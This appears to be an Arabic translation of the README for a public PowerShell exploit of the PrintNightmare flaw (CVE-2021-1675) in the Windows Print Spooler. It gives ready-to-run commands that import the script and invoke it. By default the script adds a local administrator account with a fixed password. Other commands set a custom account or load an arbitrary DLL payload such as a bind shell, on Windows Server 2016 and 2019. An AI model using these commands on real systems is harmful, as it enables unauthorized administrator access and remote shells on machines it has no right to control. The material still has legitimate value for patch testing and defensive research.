
استغلال PowerShell لـ CVE-2021-1675 (PrintNightmare) يقوم بترقية الصلاحيات محليًا عن طريق إضافة مستخدم إلى مجموعة المسؤولين المحليين عبر Print Spooler.
كاليب ستيوارت | جون هاموند | 1 يوليو 2021
CVE-2021-1675 هي ثغرة أمنية حرجة لتنفيذ التعليمات البرمجية عن بُعد ورفع الامتيازات المحلية تُعرف باسم "PrintNightmare".
تم إصدار استغلالات إثبات المفهوم (Python، C++) لقدرة تنفيذ التعليمات البرمجية عن بُعد، ونسخة C# لرفع الامتيازات المحلية. لم نرَ تطبيقًا أصليًا بلغة PowerShell الخالصة، وأردنا تجربة تحسين وإعادة صياغة الاستغلال.
ينفذ هذا السكربت بلغة PowerShell رفع الامتيازات المحلية (LPE) باستخدام تقنية هجوم PrintNightmare.

تم اختبار هذا على Windows Server 2016 و Windows Server 2019.
إضافة مستخدم جديد إلى مجموعة المسؤولين المحليين افتراضيًا:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
قم بتوفير حمولة DLL مخصصة، لفعل أي شيء آخر قد ترغب فيه.
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"